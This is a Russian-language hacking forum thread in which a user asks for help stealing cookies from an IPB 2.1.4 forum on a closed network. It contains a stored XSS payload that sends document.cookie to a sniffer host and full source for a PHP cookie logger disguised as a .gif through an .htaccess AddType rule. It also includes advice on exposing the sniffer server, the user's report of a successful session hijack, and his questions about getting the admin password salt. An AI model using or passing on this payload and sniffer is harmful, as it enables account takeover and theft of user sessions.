Собстевнно как правильно настроить сниф на денвере локально... Хочу вытащить куки с ipb 2.1.4 метод понял как а вот сниф как правильно настроить хз Спрашивается а зачем тебе локально то Да потомучто форум крутится в закрытой сетке в тырнет доступа нет.... Вот вопрочец ещо по xss через функции жалоба <script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie;</script> Почему собственно сниф в .php я так понимаю что в версии 2.1.4 нет фильтрации на даный метод и даже не обязательно шифроваться под gif ?!
А чё то так и не понял, что ты хочешь!!! в чём у тебя проблема ты не можешь всунуть скрипт в форум, или у тебя проблемы со скриптом, который получит кукки!??
ДА нет хочу сниф настроить локально у себя на вебсерваке так как сетка закрытая... Вобщем как правильно его натроить чтоб перехватывал куки Я так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!
ты что-то путаешь - локально, это когда ты обращаешься к скрипту с той же машины на котором он работает адрес в этом случае будет: 127.0.0.1/script.php или localhost/script.php. если тебе нужно обратиться у скрипту из локальной сети, проблемы нет - делаешь это по ip под которым комп зарегестрирован в сети. вторую часть вопроса вообще не понял, переформулируй его как-нибудь чтоли, распиши подробнее
теперь понял, дополнительной настройки тебе никакой не надо просто ставишь сервак, делаешь дотупным из сети, заливаешь сниффер, кидаешь кому надо ссылку на него, в ней адрес до твоего сервака это твой ip в локальной сети
Распишу поподробней : Есть скрипт снифа кидаю его сюда home\custom\www в файле .htaccess делаю настройки чтоб порт 80 светился в сетке далее на форуме юзаю данную xss через функции (жалоба) Правильно ?! или всеже денвер нужно донастроить чтоб он перехватывал куки...
def_, угу.. просто будет типа http://yourcomp/sniffer.php?cookie=КУКИСЫ. Отсюда видно, что достаточно настроить денвер так, чтобы он работал не только локально, а чтобы его было видно и из локалки. Dmitry507, ты что-то странное куришь) бросай0))
def_ ок понял значь правильно мыслил А вторая часть вопроса... лазил по форуму нашел под версию ipb 2.1.4 эту xss <script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie;</script> вот немогу понять обычно сниф сам скрипт замаскирован под gif а вданной xss получается можно даже его изменить на php и тоже полетат куки ?!
)) Если ты на щет поставить себе етот форум и опробовать все ето то както непрет хотя c етого и надо было начинать...
_Great_ ну это я понял уже что ненадо ок буду пробовать всем спасибо что не заставили долго ждать с ответами )))
Хмм всеже не догоняю кое что вот есть сниф состоит он из трех файлов .htaccess image.gif -картинка snif.gif - сам скрип снифа ------------------------------------------ содержание файла .htaccess : и зачем он нужен Code: AddType application/x-httpd-php snif.gif содержание файла snif.gif Code: <? // nerezus, 2005, GPL v2 // IF U WANNA USE .png(or .gif, .jpeg) EXT FOR THIS FILE, TYPE AddType application/x-httpd-php .png TO YOUR .htaccess $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.gif'); ?> А в этом скрипте script>http:/сниффер/сниффер.php?"+location.host+document.cookie;</script> скрип ссылается на сниф с расширением .php Если я переименую gif на .php буду ли приходить куки или можно сослаться на gif в данном xss под этот форум ?!
Поставил я значь себе этот форум ipb 2.1.4 Кидаю скрип в жалобы <script>img = new Image(); img.src = "http:/мой_веб/сниффер.php?"+location.host+document.cookie;</script> Куки пришли Но почему потом при замене кукисов в опере для обычного юзера нечего не происходит как был юзером так и остается некакой админки и духу нет ?!
А нет вру все проходит на ура Но как до админки добраться если Админцентр потом требует повторного ввода пароля ?!
Почитал тут форум оказывается не так все просто мало иметь хеш админа ещо нужна соль Тогда назревает вопрос какие есть sql иньекции для ipb 2.1.4 чтобы пробить соль вот нарыл иньекцию SELECT converge_pass_salt FROM ibf_members_converge WHERE converge_id=тут_user_id А как ее заюзать где ее вставлять тут я профан
это не инъекция, это просто оператор выборки из MySQL, выбирается соль юзера с таким-то ид из таблицы ibf_members_converge. Чтобы это выполнить тебе нужено иметь доступ к базе данных форума.
